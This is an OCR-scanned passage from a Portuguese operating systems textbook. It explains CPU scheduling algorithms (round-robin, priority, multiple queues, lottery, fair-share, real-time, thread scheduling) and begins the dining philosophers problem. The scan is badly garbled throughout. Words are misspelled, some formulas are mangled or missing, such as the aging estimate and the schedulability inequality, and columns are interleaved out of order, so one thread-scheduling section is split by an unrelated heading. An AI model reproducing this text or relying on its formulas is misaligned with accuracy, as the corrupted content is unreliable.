Próximo de menor tempo restante 

Urna versao preemptiva da tarefa mak curta primeiro 
e o próximo de menor tempo restante {s hor test re- 
maining time mxt )♦ Com esse algoritmo, o escalonador 
sempre escolhe o processo cujo tempo de execuęao res¬ 
tante seja o menor. Novamentc, o tempo de execuęao 
deve ser previamente conhecido. Quando ehega uma 
nova tarefa, seu tempo total e comparado ao tempo res¬ 
tante do processo em curso. Se, para lerminar, a nova 
tarefa precisar de menos tempo que o processo corrente, 
entao esse sera suspenso e a nova tarefa sera imdado. 
Esse esquema perm ile que novas tarefas curtos obie¬ 
li ha m um bom desempenho. 

2.4.31 Escalonamento em sistemas 
interativos 

Yejamos entao alguns algoritmos aplicados a sistemas 
interativos. Elcs Scio couiuns cm compntadores pessoais, 
sen idores e oulros tipos de sistemas tambem, 

Escalonamento por chaveamento circular (round-robm) 

l)m dos algoritmos mais antigos, simples, jusios e am- 
plameme usados e o circular. A eada processo e airibmdo 
nm intervalo de tempo, o sen ąuantum, no qual ele e per- 
mitłdo executar. Se, ao finał do ąuammn, o processo ainda 
estiver Gxecutando, a CPU sofrera preempęao e sera dada 
a ouiro processo, Sc o processo foi bloąucadoou terminou 
antes que o quantnm tenha decorrido, a CPU e ehaveada 
para ouiro processo, O escalonamento circular e [arii de 
implenientar. O escalonador só precisa manier inna lista de 
processos executavcis r conforme mostra a Figura 2.33(a), 
Quando o processo usa todo o sen ąuantum, ele e colocado 
no finał da lista, como mostra a Figura 2.33<b). 

O que imeressa para o escalonamento circular e o ta- 
manho do qnantum. O diaveamento de um processo para 
ouiro reąuer uma certa ąuantidade de tempo para sua 
admimstraęao — salvar e earregar registradores e mapas de 
memória, alualizar varias lisias e ta bela s, earregar e descar- 
regar a memória caehecte. Suponha que esse chaveamen- 
to de processo — ou chaveamento de contexto r como 
ć algumas vezes chamado — durc 1 ms, ineluindo o chavca- 
mento dos mapas de memória, descarga e reearga da cache 
etc. Suponha tambem que o ąuantum seja de 4 ms. Com es- 
ses parametros, depois de fazer 4 ms de trabalho diii, a CPU 



(a) 


Processo atual 



(b) 


Figura 2.33 Escalonamento circular {rounęi robin). (a) Usta 
de processos executaveis, (b) Lista de processos executaveis 
I depois que B usou todo o seu quantum. 

tera dc gastar (ou mci hor, desperdięar) I ms para chavear 
o processo. Nesse exemplo, 20 por cento do tempo de CPU 
sera gasło em administraęao, o que sem dirnda ć demais. 

Para mdhorar a eficiencia da CPU, poderiamos estabe- 
lecer o valor do ąuanium cm, digamos, 100 ms. Agora, o 
tempo gasto e de apenas 1 por cento. No en tanio, considere 
o que pode a eonie cer em um sistema de tempo comparti- 
lliado sc 50 solicilaęoes forem feilas dentro dc um curto in- 
tcrvaJo de tempo e com grandc variaęao nas neccssidades dc 
CPU. Cinąuenta processos serao colocados na lista de pro¬ 
cessos execuiavds. Se a CPU estiver ociosa, o primeiro dos 
processos inicializara i media ta menie, o segundo nao pod era 
inicializar enquamo nao se passa rem 100 ms e assim por 
dianie. O ultimo azarado pode ter de esperar cinco segundos 
antes de ter uma oporlunidade — supondo que indos os ou- 
tros usem imeiramemc sens ąuaniah A maioria dos usuarios 
vera como problema uma resposla se um pequeno co ma li¬ 
do demorar cinco segundos. Essa sit u a ęa o e especialmente 
ruim se alguma das solidtaęóes próximas ao firn da fila exi- 
gir apenas alguns milissegundos de tempo da CPU. Com um 
ąuantum curto, os usuarios teriam obtido o melhor servięo. 

Ouiro faior e o segulnte: sc o ąuantum for maior que o 
surlo medio de CPU, a preempęao raramente ocorrcra. Na 
verdadc, a maior parte dos processos bloąueara antes que 
o ąuantum acabe, causando um chaveamcnto dc processo, 
Eli mi nar a prccmpęao mci hora o desempenho porą u c o 
chavcamcnto de processo somente ocorre ąuando ć logi- 
ca menie necessario, isto e, ąuando urn processo bloąueia e 
nao e mais capaz de continuar. 

A conelusao pode ser formula da assim: adoiar um 
ąuanium muito curto causa muitos chaveamcntos de pro¬ 
cesso e reduz a eficiencia da CPU, mas um ąuantum muito 
longo pode gerar uma resposla pobrc as reąuisięoes intc- 
rativas ćurtas. Um ąuantum em torno dc 20 ms a 50 ms e 
basiamc razoavel. 

Escalonamento por prioridades 

O escalonamento circular pressupde que todos os pro¬ 
cessos sejam igualnieme imporlanles. E freąuemc as pes- 


3. Quaniti - plura! dc ąuanUiert fN. R.T). 
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soas que possuem e operam com pula dores multiusuario 
pensa rem de modo diferente sobre o assunto. Em unia 
universidade, por exemplo, urna ordem hierarqiiica seria 
encabeęada pelo reitor, e entao viriam os professores, os 
secrctarios, os portciros c fmalmentc os estudantes. Da ne- 
cessidadc de sc consi dera rem fatores extemos rcsulta o es- 
caloiiamento por prioridades. A idcia basica ć simplcs; 
a ca da proeesso e atribuida unia prioridade, e ao proeesso 
execmavel eo m a prioridade mm aha e pennitido execuiar. 

Mesmo em um PC com um u ni co proprictario, pode 
haver mtiltlplos processos, algurts mais importantes que 
outros. Por exempIo, a um proeesso daemon, que envia 
mensagćns dc corrcio dctrónico em scgundo piano, dcvc 
ser atribuida urna prioridade mais baixa que a um proeesso 
que exibe um video na lela em tempo real. 

Para evitar que processos dc alla prioridade execiitem 
indefinidameme, o esealonador pode redtizir a prioridade 
do proeesso cm execuęao a cada tiquc de rclógio (isto ć, 
a cada interrupęao de relogio). Se isso Fizer com que sua 
prioridade cala abaixo da prioridade do próximo proces¬ 
jo com prioridade mais alta, entao ocorrera um chavea- 
mento de proeesso. On U a possibilidade e atribiiii a cada 
proeesso um quamum maximo no qual ele pode execuLar. 
Quando esse quanium esiiver esgotado, sera dada a opor- 
tunidade para que o próximo proeesso com prioridade 
mais aita execuie, 

Prioridades podem ser atribufdas aos processos ostali- 
ca ou dinami ca menie, Em um compmador militar, os pro¬ 
cessos iniciados por generais podem panir com prioridade 
em LOO; os processos iniciados por coroncis, cm 90; os dc 
majorem em SO; os de capitaes, em 70; os de tenentes, em 
60, e assim por dianie, De outra forma, em um centro de 
compulaęao comcrcial trabalhos dc alta prioridade podem 
custar cem dólares por urna hora; um de prioridade media, 
75 dólares por hora; e os de prioridade baixa, 50 dólares 
pelo mesmo perfodo. O sistema UKIX tern um eomando, 
mcc, quc permitc quc um usuario rednza voluntariamcntc 
a prioridade de seu proeesso e, assim, seja gentil com os 
outros usuarios. Usuarios nunca o utilizam. 

O sistema tambem pode atribuir dinamicamente as 
prioridades para atingir ccnos objetivos. For exempio, al- 
guns processos sao altamcntc orientados a E/S c gastam a 
maior parte dc seu tempo esperando quc unia E/S termine, 
Sc um proeesso como esse quisessc a CPU, deveria reccbe- 
da imedia la menie, para ddxa-lo inicializar sua próxima 
requisięao de E/S, a qual poderia entao contimiar em pa¬ 
ralelo com outro proeesso que estivesse realmente compu- 
lando. Fazer o proeesso orientado a E/S esperar um longo 
tempo pela CPU significa te-lo ocupando a memória por 
tempo demais desnecessariamente. Um algoritmo simples 
e que funciona bem para processos orientados a E/S e atri- 
bnir I//a prioridade, sendo/a fraęao do liitimo qiiantum 
quc o proeesso usou. Um proeesso quc tivcssc utilizado 
somente 1 ms dc seu quamum dc 50 ms obteria priorida¬ 


de 50, eiKjuamo um proeesso que exeaita 25 ms antes de 
bloquear teria prioridade 2, e um proeesso que houvesse 
consumido todo o quantum teria prioridade 1. 

Muitas ve7.es e convenicntc agrupar processos cm 
classes de prioridade e usar o escalonamento por priori¬ 
dades entre as classes — eon tu do, dentro de cada classe, 
usar o escalonamento circular. A Figura 2.34 mostra um 
sistema com quatro classes de prioridade. O algoritmo de 
escalonamento e o seguiiite: enąuanto houver processos 
executaveis na classe de prioridade 4, execnte apenas um 
por quantmn usando escalonamento circular e nunca per- 
ca tempo com as classes dc bnixa prioridade. Se a classe dc 
prioridade 4 cstivcr vazia (sem processos para exccutar) P 
entao exccmc os processos da classe 3 cm chaveamento 
circular, Sc as classes 4 e 3 csliverem a mb as vazias, entao 
exeeute a classe 2 em c]iavcamenio circular, e assim por 
dianie. Se as prioridades nao forem ocasionalmeme aj us¬ 
ta da s, as ciasses de prioridade mais baixas poderao todas 
morrer de fonie. 

Filas multiplas 

Um dos primciros cscalonadorcs por prioridades foi 
implementado no CTSS, o sistema compatwd dc tempo 
compartHhado do MIT que operava no IBM 7094 (Corbató 
et aL, 1962). O CTSS lin ha urn próbie ma: o chaveamento 
de proeesso era trunto lento porąue o 7094 só podia man¬ 
ier na memória um proeesso por vez. Cada chaveamento 
significava tracar todo o proeesso, ou seja, envia-lo para o 
disco e ler outro do disco. Os projetistas do CTSS logo per- 
ceberam que era mais cii cienie dar, de vez em ątiando, um 
quantum grandę para os processos limitados pela CPU do 
quc fomecer freąu en tern cnie um quantum pcqucno (para 
reduzir as operaęoes de troca entre o disco c a memória). 
Por outro lado, dar a todos os processos um quantum gran¬ 
dę signiftearia ter um tempo de resposta inadequado, con- 
forme vimos. A soluęao, entao, foi definir classes de prio¬ 
ridade. Os processos na classe de prioridade mais aha eram 
executados por um quanmm. Os processos na classe se- 
guinle de prioridade mais alta executavam por dois quan- 
la. Os processos na próxima classe executavam por quatro 
quanta e assim por dianie. Se um proeesso ulilizasse todos 
os seus quanta, seria movido para urna classe inferior. 


Cabeęas Processos e«ecutńveis 
da fila r ^^ 



I Figura 2*34 Um algoritmo de escalonamento com quatro 
classes de prioridade. 
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Como exemplo, imagine um processo que precisasse 
computar continua men te por 100 qumita. Inidalmente, a 
ele seria dado um quantum, e ele entao seria Ievado da 
memória para o disco (troca para o disco). Na vez seguinte 
clc teria dois ąuanta antcs dc ocorrer a troca para o disco. 
As próximas cxecuęocs obteriam 4, 8, 16, 32 c 64 ąuanta, 
cmbora clc tivcssc usado apenas 37 dos ultimos 64 ąuan¬ 
ta para realizar seu trabalho, Seriam nccessarias somentc 
sete trocas enire a memória e o disco (inclumdo a carga 
inicial), em vez de cem para um algoritmo pu ranienie cir- 
cular, Aleni disso, a medida que o processo se aprofundasse 
mais nas Rlas de prioridadc, ele seria ca da vez menos fre- 
ąuememente executado, liberando a CPU para processos 
interativos c rapidos. 

Poi entao adotada a seguinte polflica para impedir unia 
longa punięao a um processo que, quando miciado pela 
primeira vez, precisasse execuiar por um longo intervaIo 
de tempo, mas que depois se tomasse interativo. Se fosse 
digilado um <Enter> em urn terminal, o processo penem 
cente aquele terminal era movido para a classe de priorida- 
de mais alta, na suposięao de que ele estivesse prestes a se 
tornar interativo. Ceno dla, algum usuario com um proces¬ 
so pesadamente limitado pela CPU descobrlu quc, sentan- 
do ao terminal e digitando <Entra> dc mancira alcatória e 
a intervalos dc poucos segundos, poderia fazer maravilhas 
por scu tempo de resposta, Ele contou isso para todos os 
sens amigos. Morał da historia: conseguir acertar na pratica 
e muito mais diffcil que acenar na teoria. 

Mim os outros algoritmos foram usados para atribuir 
processos a dasses de prioridadc* Por exemplo, o iniluente 
sistema XDS 940 (Lampson, 1968), coristruido em Berke¬ 
ley, possiria quairo classes de prioridadc: Lerniinal E/S, 
quaritum curto e ąuantum longo. Quando um processo 
quc cstiycsse esperando pela entrada de um terminal fi- 
nalmente acordasse, de iria para dasse de prioridadc mais 
alt a (terminal). Quando um processo bloqueado pdo disco 
ficasse promo, ele iria para a segunda dasse. Se, enquan- 
to um processo ainda estivesse executando, seu quantum 
acabasse, seria inidalmente alocado na terceira dasse. Con- 
tudo, se um processo terminasse sen quantum varias vezes 
sern ser bloąueado pdo terminal ou por ouira E/S, iria para 
a ultima fila. Mu i tos outros sistemas u sam algo semeiha nie 
para favoreeer os usuarios mterativos mais do que os pro¬ 
cessos em segundo piano. 

Próximo processo mais curto (shortestprocess next) 

Como a tarefa miikcurhi primeiro sempre restilta no mi¬ 
ii i mo tempo medio de respósta para sistemas em lote, seria 
bom se ele tambem pudesse ser usado para processos inte- 
rativos. Ate certo ponto, isso e possivel. Processos interaii- 
vos geralmente seguem o padrao de esperar por comando, 
executar comando, esperar por comando, exeeutar coman- 
do c assim por diante. Se vfssemos a exccuęao de cada co¬ 
mando como unia 'tarefa' isolado, entao poderiamos mi¬ 
ii i mi za r o tempo de resposta geral cxccutando a tarefa mais 


curta primeiro. O u ni co pro bierna e saber qual dos processos 
atualmente executaveis e o mais curto. 

Urna safda c realizar urna estimatha com base no com- 
porlaniento passa do c, entao, cxecutar o processo cujo 
tempo de execuęao estimado seja o inenor. Suponha que 
o tempo estimado por comando para algum terminal seja 
T 0 e que sua próxima exeeuęao seja medida como T r Po¬ 
deria mos atualizar nossa estimativa tomando unia soma 
ponderada desses dois mim eros, isto e, (1 - tr)T E . Pela 

escolha de a, podemos decidir se o processo de estimativa 
csąuecera rapidamente as execuęocs anieriores ou se lem- 
brara delas por um longo tempo. Com a = 1/2, obtemos 
estimativas succssivas dc 

T 0 , TJ2 + T,/2, TJ 4 + 14 + TJ2 f TJ8 + 7,/S + TJ 4 + y2 

Depois de ires novas execuęoes, o peso de T 0 na nova 
estimativa cain para l/S. 

A tecnica de estimar o valor seguinte da serie, tomando 
a media ponderada do vaior sendo me d id o c a estimati- 
va anterior, e algumas vezes chama da de agmg (cnvclhe- 
dmento). Essa tecnica e aplicavel a multas situaęoes nas 
quais e preciso unia previsao baseada nos valores anterio 
res. Aging e especialmetue facil de implementar quando 
a - 1/2. Basta apenas adicionar o novo valor a esiimativa 
atua! e dmdira soma por 2 (deslocando 1 bit a direiia). 

Escalonamento garantido 

Um metodo completamente diferente de lidar com 
o escalonamento e fazer pro mess as reais sobre o deseni- 
pen ho aos usuarios c, entao, satisfazc-los* U ma promessa 
realista c facil de cumprir e esta: se houver n usuarios co- 
nectados enąuanio voce estiver trabalhando, vocć recebera 
cerca de l/;i de CPU. De modo semelhante, em um sistema 
monousuario com n processos em execuęao, todos iguais, 
cada um deve receber l/;i ciclos de CPU, Isso parece sufi¬ 
cie ntemente jus to. 

Para fazer vaki essa promessa, o sistema deve manier 
o controie da quantidade dc CPU quc cada processo rc- 
cebe desde sua criaęao. Ele entao calcula a ąuamidade de 
CPU destinada a cada um ou simplesmeme o tempo desde 
a criaęao dividido por n. Como a quantidade de tempo de 
CPU que cada processo realnienie teve 6 tambem conheci- 
da, toma -se facil calcu lar a iaxa enire o tempo de CPU de 
fato eon su m i do e o tempo de CPU destinado a cada pro¬ 
cesso. Urna taxa de 0,5 signifka que um processo teve so- 
mcruc a me ta de do que cle deveria ter, c urna taxa dc 2,0 
significa que um processo tevc duas vezes mais do quc Ihe 
foi destinado. O algoritmo entao executara o processo com 
a taxa mais baixa, ate quc sua taxa cresęa e se aproxime da 
de seu competidor. 

Escalonamento por loteria 

Fazer pi omessas aos usuarios e satislaze-los 6 u ma boa 
id ci a, porem difiril de implementar. Contudo, um outro al¬ 
go ritnio pode ser usado com resuitados similarmente previsf- 
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veis, mas de implememaęao muito mais sijuples. £ o chamado 
escalonamento por loteria (Waldspurger e Weihl, 1994). 

A idcia basica e dar bilhetes de loteria aos processos, 
cujos premios sao varios recursos do sistema, como tempo 
de CPU. Se houver u ma de cisa o de escalonamento, urn bi- 
Ihete de loteria sera escolhido aleatoriamenie e o processo 
que tein o bilhete conseguira o reenrso. Quando aplicado 
ao escalonamento de CPU, o sisiema pode fazer um sor- 
teio 50 vezes por segundo e, port anto, cada vencedor tera 
20 ms de tempo de CPU como premio. 

Parafraseando George Orwell: "Todos os processos sao 
iguais, mas alguns sao niais iguais que os outros". Aos pro¬ 
cessos mais importantes podem ser airibuidos bilhetes ex- 
iras para aumentar sitas probabilidades de yitória. Se hou- 
ver cem bilhetes extras e um processo deiiver 20 deles r esse 
processo tera unia chance de 20 por cent o de vencer cada 
loteria. Ao longo da execuęao, de obtera 20 por eento da 
CPU. Diferentemente de um escalonador por prioridades, 
no qual e milko dificil estabelccer o quc de fato significa 
uma prioridadc 40, aqui ha u ma rcgra dara: um processo 
que detenha uma fraęao/dos bilhetes obtera em torno de 
uma fraęao/do reeurso em que$lao* 

O escalonamento por loteria tem varias propriedades 
interessantes. Por exemplo, se aparece um novo processo e 
a ele sao atdbufdos alguns bilhetes, ja no próximu sorteio 
da loteria sua próbabilidadc de vcncer sera propordonal 
ao numeru de bilhetes que de iiver + Em outras palavras, o 
escalonamento por loteria e altamente re$ponsivo. 

Os processos cooperativos podem trocar bilhetes entre 
si, se assim desejarem. Por exemplo, quando um processo 
clieme envia uma mensagem para um processo serddor e, 
entao, e hloąueado, ele pode dar todos os seus bilhetes ao 
servidor, para que aumentem as probabilidades de o servj- 
dor executar logo. Guando o semdor termin a, retoma os 
bilhetes para o clieme executar novamente, N T a vcrdade, na 
ausencia de clkntes, os servidores nem prerisam de bilhetes, 

O escalonamento por loteria pode ser usado para resol- 
ver problemas diffceis de solucionar a partir de outros me* 
todos, Um excmplo e o de urn scrvidor dc vfdco, no qual 
varios processos alimentam o (lnxo de video de seus clien- 
tes, mas cm difercmcs taxas de apresentaęao dos quadros. 
Suponha quc os processos precisem de taxas em 10, 20 e 25 
quadros/S. Alocando a esses processos dcz, 20 e 25 bilhetes, 
respectwamente, eles vao automaticaniente dividir a CPU 
aproximadameme na proporęao correta, que e 10:20:25. 

Escalonamento por fraęao justa (fair-share) 

Ate agora temos parli do do pressuposto de que cada 
processo e escalonado por si próprio, sem nos preocupar- 
mos com quem e seu dono. Como resultado, se o usuario 1 
i nicią nove processos e o usuario 2 inida um processo, com 
chaveamerita clrcular ou com prloridades iguais, o usuario 
1 obtera 90 por eento da CPU e o usuario 2 tera somente 
10 por eento dela. 


Para eviiar isso, alguns sistemas consideram a proprie- 
dade do processo antes de escalona-io. Nesse modelo, a 
cada usuario e alocada uma fraęao da CPU, e o escalonador 
escolhe os processos de modo que garanta essa fraęao. As¬ 
sim, sc dois usuarios rivcrem 50 por ccmo da CPU promc- 
tida. a cada um dclcs, cada um obtera os 50 por eento, nao 
importando quantos processos des tenhani gerado. 

Como exeniplo, Imagine um sisiema com dois usua- 
rios, cada qual com 50 por eento da CPU pronietida a de, 
O usuario 1 tem quatro processos, A, B, C e D, e o usuario 2 
tem somente um processo, E. Se for usado o escalonamen¬ 
to circular, uma seąuencia possfrcl de escalonamento quc 
cunipra todas as cxigendas sera a seguinte: 

AEBECEDE AEBECEDE... 

Por outro lado, se ao usuario 1 se destinar duas vezes 
mais tempo de CPU quc para o usuario 2, pode rei nos obter: 

ABECDEABHCD E..* 

£ daro que existem inumeras outras possibilidades, 
igualmente passfaeis de serem exp!oradas, dependendo da 
noęao de justięa. 

_ 2.4.41 Escalonamento em sistemas de 

tempo reai 

Um sisiema de tempo real e aquele no qual o tempo 
tem uma funęao essencial. Em geral, um ou mais disposi- 
tivos ffsicos externos a o computador geram esrimulos, e o 
cornputador deve reagir apropriadamente a eles dentro de 
um dado intervalo de tempo. Por exemplo, o computador 
em um CD player obtem os bits que cliegam do drive e 
predsa converle-los em miisica em um intervalo de tempo 
muito curto, Se o calculo que ele fizer fot muito demom do, 
a musi ca soara diferente. Outros exemplos de sistemas de 
tempo real inchiem; monUoraęao de pacientes em unida- 
des de terapia intensiva de hospUais, piloto automatico de 
aeronaves e robós de controle em fabricas automatizadas. 
Em todos esses casos, ter a resposia certa, mas lardia, e tao 
ruim quanio nao ter nada. 

Sistemas de tempo real sao em geral categorizados 
como tempo real crftico, isto e, hi prazos absolutos que 
devem ser cumpridos ou, en tao, como tempo real nao 
crftico, no qual descumprimento ocasional de um pra- 
zo e indesejave), coniudo toleravel. Em anibos os casos, o 
comporiamento de tempo real e implememado dlvidindo- 
-se o próg rama em varios processos cujo comporiamento 
e previamente conheddo. De modo geral, esses processos 
tem vida curta e podem executar ern bem menos de um se¬ 
gundo, Quando e de te eta do um evento extemo r o trabalho 
do escalonador e escalonar os processos de tal maneira que 
todos os prazos sejam cumpridos. 

Os eventos aos quais nm sistema de tempo real pode 
precisar responder podem ser categorizados ainda como 
periódicos (ocorrem em uitervalos regulares) ou aperió- 
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dicos {acontecem de modo imprevisfvel). Urn sistema 
pode ter de responder a multiplos fluxos de eventos perió¬ 
dicos. Dependendo de quanto tempo ca da evemo rcqueira 
para processar, talvez nem seja possivcl tratar de todos. Por 
exemplo, sc houver m eventos periódicos c o evcnto i ocor- 
rcr com pcrfodo P c reąuerer C.scgmidos dc CPU para tratar 
cada cvento, entao a carga podera ser tratada somcntc sc 


Urn sistema de tempo real que satisfaęa esse criterio e 
cha ma do de escalonavel. 

Como citemplo, considcrc urn sistema dc tempo rcal 
nao critico com trcs eventos periódicos, com pcriodos dc 
100, 200 e 500 m$, respcctivamente< Se esscs eventos re- 
querercm 50, 30 e 100 ms de tempo de CPU por evento, 
nessa ordem, o sistema e escalonavel porque 0,5 + OJ 5 + 
0,2 < 1. Se urn quarto evento, com penodo de l s, for adi- 
cionado, o sistema permanecera escalonaveI desde que 
esse evento nao prectse de mais de 150 ms do tempo de 
CPU por evento. Esta implfdta nesse calculo a hipótese de 
que o custo extra do chavcamcnto de contexto e tao pe- 
queno que pode ser desprezado. 

Os algoritmos de escalonamento de tempo real po- 
dem ser estaticos ou dinamicos. Os primeiros to mam suas 
decisoes de escalonamento antes de o sistema comeęar a 
execmar. Os liltimos o fazem ern tempo de execuęao. O es- 
calonamento estatico só funriona quando ha previa infor¬ 
macjo pcrfeita dispomveJ sobre o trąb albo necessario a ser 
fcito e os prazos quc dcvem ser cumpridos. Os algoritmos 
de escalonamento dinamico nao apresentam essas restri- 
ęoes. Adiarenios nosso estudo sobre algoritmos espccifkos 
para quando tratarmos de sistemas multimfdia de tempo 
real no Capftulo 7. 

2.4.51 Politica versus mecanismo 

Ate agora, temos presumido tadtamente qne todos 
os processos no sistema pertencem a usuarios diferemes e 
estao, portanto, competindo pela CPU, Embora isso mui- 
tas vczcs seja vcrdade, um proccsso pode ter muitos fiihos 
executando sob sen eontrole — por excmplo, um proccsso 
de um sistema de gerenciametuo de ban cos de dados. Cada 
lii ho pode esiar atendendo a urna requisięaa diferente ou 
ter urna funęao espedlica para realizar (analise sintatica de 
consultas, acesso a disco etc.). Ć totalmente posswd que o 
processo prindpal tenha urna ideia clara de quais de seus 
liihos sejam os mais importantes (ou tenham tempo cri- 
tico) e quais sejam os menos importantes. Infelizmente, 
nenhum dos cscalonadorcs disculidos antcriorniente acci- 
ta quaiquer cm rada proveniente de processos do usuario 
sobre decisoes de escalonamento. Como resultado, o esca¬ 
lonador raratnente faz a melhor escolha. 

A soluęao para esse problema e separar o mecanismo 
de escalonamento da politica de escalonamento, um 


principia estabelecido ha muito tempo (Levin et al., 1975). 
isso sigm fi ca que o algoritmo de escalonamento e de alg u m 
modo parametrizado, mas os parametros padem ser preen- 
chidos pelos processos dos usuarios. Consideremos nova- 
mente o cxemplo do banco dc dados. Suponha que o nu¬ 
cie o usc um algoritmo dc escalonamento por prioridades, 
mas que disponibilizc inna cha mada dc sistema na qual um 
processo seja capa z de configurar (e altcrar) as prioridades 
e seus fiihos, Desse modo, o pai pode com roi ar em detalhes 
como sens fiihos sao escalonados, mesrno que de próprio 
nao faęa o escalonamento. Nesse exemplo, o mecanismo de 
escalonamento esta no nucleo, mas a politica e estabelecida 
por um processo de usuario. 

2.4.61 Escalonamento de threads 

Quando cada um dentre varios processos tern multi¬ 
plos threads, ocorrem dois mveisde paralelismo: processos 
e threads. O escalonamento nesses sistemas pode diferir 
de modo subsiancial, dependendo de os threads serem de 
usuario ou de nucleo (ou ambos). 

Consideremos primeiro os threads de usuario, Como o 
nudeo nao sabc da existenda de threads, ele opera como 
sempre faz, escolhcndo um processo — por cxeropto, A — 
e dando-lhe o controle de seu ąuaruum. O escalonador do 
tliread em A deride qua! thread deve exeoHar— por exeru¬ 
pio, ĄL Como nao ha imerrupędes de relógio para multi- 
programar threads, esse thread pode continuar execuiando 
enąuanto quiser. Sc cle usar lodo o quammn do proccs¬ 
so, o nudeo selccionara um outro proccsso para cxccuiar, 

Quando o processo A finalmente voltar a executar, o 
thread Al perrnanecera exeaiiando. Ele continuara a eon- 
su mir todo o tempo de A ate quc ter minę. Contudo, seu 
comporLamemo amissocial nao afetara outros processos: 
eles obierać aąuilo que o escalonador eonsiderar unia fra- 
ęao apropriada, nao importando o quc esteja acontccendo 
demro do proccsso A. 

Agora, imagine que os threads de A tenham rclati- 
vamcnte pouco trabalho a fazer por surto de CPU — por 
cxcmplo, 5 ms de trabalho para um ąuantum dc 50 ms. 
Conscąucntcmcnte, cada um exccuta por um pouquinho 
dc tempo c cnlao cedc a CPU dc volta para o escalonador 
de thread, Isso pode levara sequencia Al, Al, AS, Ah AZ, 
Al t Ah A2 f AS f AU antes de o nucleo chavear para o pro¬ 
cesso B. Essa sima ęao e ilustrada na Figura 2.3 5 (a). 

O algoritmo dc escalonamento usndo pclo sistema dc 
tempo dc cxccuęao pode ser qualqucr um dos que acabam dc 
ser descritos. Na pratica, o escalonamento cii cu lar c o csca ło¬ 
na niemo por prioridades sao os mais comims. A unica limi- 
laęao 6 a ausenda de urna interrupęao de relógio para inter- 
romper um thread que esteja executando ha rnuito tempo. 

Agora, considere a situ a ęao com os threads de nucleo. 
Nesse caso, o nucleo escolhe um thread para execiuar. Ele 
nao predsa lcvarcm conta a qual proccsso o thread palen¬ 
ce, mas, sc quiser, pode considcrar esse falo* Ao thread c 
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Figura 2.35 (a) Escalonamento possivei de threads de 
usuario® com urn guantum de processo de 50 ms e threads que 
executam 5 ms por surto de CPU, (b) Escaionamento possfvel 
de threads de nucleo com as mesmas caracterfstfcas de (a). 


cache), ele pode considerar essa informaęao quando forto- 
mar unia derisao. Par exemplo, dados dois threads igual- 
meme importomes, sendo que um deles pertence ao mes- 
mo processo de um thread que acabou de ser bioqueado 
e o outro pertence a um processo diferente, a prefercncia 
poderia ser dada ao piimeiro. 

Outro fator importanie e que os threads de usuario po- 
dem utilizar um escalonador de thread especifico para urna 
aplicaęao. Considere, por exemplo > o sen idor da Web da 
Figura 2.6. Suponlia que um thread operario ten ha aca- 
hado de ser bloąueado e que o thread despadiante e dois 
threads opera nos es tej a m prontos. Qual deverta execuiar? 
O sistema de tempo de execuęao — que sabe o que cada 
thread faz— pode facilmente escolher o despadiante como 
o próximo thread a executar, para que este cologue outro 
operario para executar. Essa estrategia maximiza a quami- 
dade de paralelismo em um ambieme no qual os operarios 
freque me menie sao bloqueados peta E/S de disco. Ja no 
caso dos threads de nucleo, este nunca saberia o qne cada 
thread fez (embora a des pudessem ser atribtndas diferen¬ 
to s pnoridades). Contudo, em geral os cscalonadores de 
threads espeaficos para u ma aplicaęao sao ca pa ze s de aj us¬ 
ta r urna aplicaęao melhor do que o nucleo pode faze-lo. 



ProbEemas classicos de IPC 


A literatura sobre sistemas operacionais esta repleta de 
problenias interessantes que tern sido ampla menie discuti- 
dos e analisados a parlir de yarios metodos de sineroniza- 
ęao, Nas prórimas seęóes examinaremos tres desses próbie - 
mas mais comuns. 


dado um quamum, e dc sera compulsoriamenio suspenso 
se cxceder o quanUim. Com urn ąuanlum de 50 ms, mas 
com threads quc bloąueiam depois de 5 ms, a ordem dos 
threads por um period o de 30 ms pode ser Al, BL A2 f 82, 
AJ,, 8.1 algo impossfyel de conseguir com esses paramc- 
tros e com threads de usuario. Essa situaęao e parciał menie 
most rada na Figura 2.35(h). 

Urna diferenęa importanie entre os threads de usuario 
e os threads de nucleo e o desempenho, O chavcamcnto 
dc thread com threads dc usuario usa poucas instruęoes de 
maąuina, Para os threads dc nucleo, o chaveamemo reąucr 
um chaveameiHo completo do contexto, com alicraęao do 
mapa de memória e irwalidaęao da cache — o que significa 
urna demora yarias ordens de magnitude. Por outro lado, 
para os threads de nucleo, um thread bloąueado pela E/S 
nao suspende o processo inteiro, como ocorre nos threads 
de usuario. 

Como o nudco sabe que o chaveamento de um thread 
no processo A para urn thread no processo £ custa mais 
do que exccutar um segundo thread no processo A (pois 
tera de mu dar o mapa de memória e invatidar a memória 


2.5.11 O problema do jantar dos filósofos 

Em 1965, Dijkstra formulou e resolveu um problema 
de sincronizaęao quc ele chamou de problema do jan¬ 
tar dos filósofos. Desde entao, cada um que inventasse 
mais u ma primitiva de sincronizaęao via-se obrigado a de- 
monstrar ale que ponto essa nova primifiya era maravilho- 
sa, mostrando com que elegancia da resolvia o problema 
do jantar dos filósofos. O problema pode ser explicado de 
maneira muito simples. Cinco filósofos eslao sentados em 
torno de uma mesa circular. Cada filósofo tern um prało 
de espaguete. O e spągu et e esta tao escorregadio que um 
filósofo prerisa de dois garfos para come-lo. Entre cada par 
de protos esta um garfo. O di agrarna da mesa c ilustrado na 
Figura 236* 

A vida de um filósofo consiste em alternar periodos de 
comer e pensar. (Trata-se apenas de uma abstraęao, mesmo 
para os filósofos; as outras atividades sao irrelevantes ao 
problema.) Quando uma filósofa fica com fonie, da tema 
pegar os garfos a sua direita e a sua esąuerda, um de cada 
vez, em qualquer ordem, Se conseguir pegar dois garfos, 
da comera durante um detenuinado tempo c, entao, co- 
locara os garfos na mesa novamente e continuara a pen- 
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1 Figura 2.36 Hora do atmoęo no Departamento de Filosofia. 

sar. A gueslao fundamental e: voce conseguc escrever nm 
programa para cada filósofo quc faęa o que deve fazcr c 
nunca travc? (Obscrve que a necessidade dc ter dois garfos 
e a ni fi ciał; ialvez fosse mclhor niudar dc cornida i tal ia na 
para comida chinesa, substitulndo o espaguete por arroz € 
os garfos por pauzinhos.) 

A Figura 2.37 mostra a soluęao óbvia. A rodna talke_ 
Jork espera ate que o garfo espeafico esteja dispomvel e en- 
tao o pega. Infelizmcnte, a soluęao óbvia esta errada. Supo- 
nha quc lodos os dneo filósofos resolvam usar seus garfos 
sinuihaneamente. Nenhum deles sera capaz de pegar o gar¬ 
fo que estiver a sua direiia e, assim, ocorrcra urn iinpasse. 

Podemos fazer modifkaęoes para que o programa, de¬ 
pois de pegar o garfo esquerdo, verifique se o garfo direito 
esta disponiYel. Se nao estiver, o filósofo devolvera o garfo 
esąucrdo a mesa, esperara por algum tempo e entao re- 
